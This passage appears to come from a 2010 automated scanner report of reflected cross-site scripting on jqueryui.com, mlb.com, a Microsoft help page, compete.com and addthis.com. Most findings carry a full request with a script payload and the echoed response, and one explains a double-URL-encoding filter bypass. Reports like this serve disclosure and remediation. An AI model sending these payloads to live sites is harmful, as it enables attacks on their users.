GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFda533"><script>alert(1)</script>98ab798f7d6&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10a11"><script>alert(1)</script>f172063c345 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000010a11"><script>alert(1)</script>f172063c345&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88141"><script>alert(1)</script>d9f5706c1f3 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF88141"><script>alert(1)</script>d9f5706c1f3&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... erColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF88141"><script>alert(1)</script>d9f5706c1f3&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_so ...[SNIP]...
2.77. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01bb"><script>alert(1)</script>9b3eca5e28b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?c01bb"><script>alert(1)</script>9b3eca5e28b=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:51:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7177c"><script>alert(1)</script>9758f4953a3 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px7177c"><script>alert(1)</script>9758f4953a3&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5167"><script>alert(1)</script>0387f9320ec was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxb5167"><script>alert(1)</script>0387f9320ec&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd2d"><script>alert(1)</script>4975e57d1e5 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=356cd2d"><script>alert(1)</script>4975e57d1e5&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 627d6"><script>alert(1)</script>c245b5368fc was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100627d6"><script>alert(1)</script>c245b5368fc&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5b8"><script>alert(1)</script>939b7359cb6 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px9a5b8"><script>alert(1)</script>939b7359cb6&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
2.83. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mlb.mlb.com
Path:
/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b08"><script>alert(1)</script>b44d30a1246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jsp?c3b08"><script>alert(1)</script>b44d30a1246=1 HTTP/1.1 Host: mlb.mlb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=600 Expires: Sat, 20 Nov 2010 18:06:26 GMT Date: Sat, 20 Nov 2010 17:56:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 131968
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/ ...[SNIP]... <meta property="og:url" content="http://mlb.mlb.com/index.jsp?c3b08"><script>alert(1)</script>b44d30a1246=1&tcid=fb_share" /> ...[SNIP]...
2.84. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinehelp.microsoft.com
Path:
/en-US/bing/ff808535.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a64c2"><script>alert(1)</script>740e1573786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808535.aspx?a64c2"><script>alert(1)</script>740e1573786=1 HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAABNBgAAM19VJr1F78JLHJiR+JO+Sw!!&M=1; domain=.microsoft.com; expires=Tue, 20-Nov-2040 17:56:36 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 20-Nov-2040 17:56:36 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 17:56:35 GMT Content-Length: 43681
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bff31<a%20b%3dc>ace790abb9 was submitted in the REST URL parameter 1. This input was echoed as bff31<a b=c>ace790abb9 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /DOMAINbff31<a%20b%3dc>ace790abb9/ HTTP/1.1 Host: siteanalytics.compete.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 16:52:54 GMT Server: Apache Vary: Cookie Content-Length: 20140 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <h1> domainbff31<a b=c>ace790abb9 </h1> ...[SNIP]...
The value of the fn request parameter is copied into the HTML document as plain text between tags. The payload f9815<script>alert(1)</script>172a4ed3072 was submitted in the fn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload f1910<script>alert(1)</script>016f7840526 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the componentTypeViewerList request parameter is copied into the XML document as plain text between tags. The payload 18780%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb4ced27665b was submitted in the componentTypeViewerList parameter. This input was echoed as 18780<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b4ced27665b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the componentTypeViewerList request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f34c<script>alert(1)</script>318892cabab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php8f34c<script>alert(1)</script>318892cabab HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:15 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=p81rjp77olcodosmm631qfhim3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php8f34c<script>alert(1)</script>318892cabab</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb9a"-alert(1)-"112f98354b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php6eb9a"-alert(1)-"112f98354b8 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 16:56:15 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php6eb9a"-alert(1)-"112f98354b8"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.91. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c07c"-alert(1)-"345ff452a56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
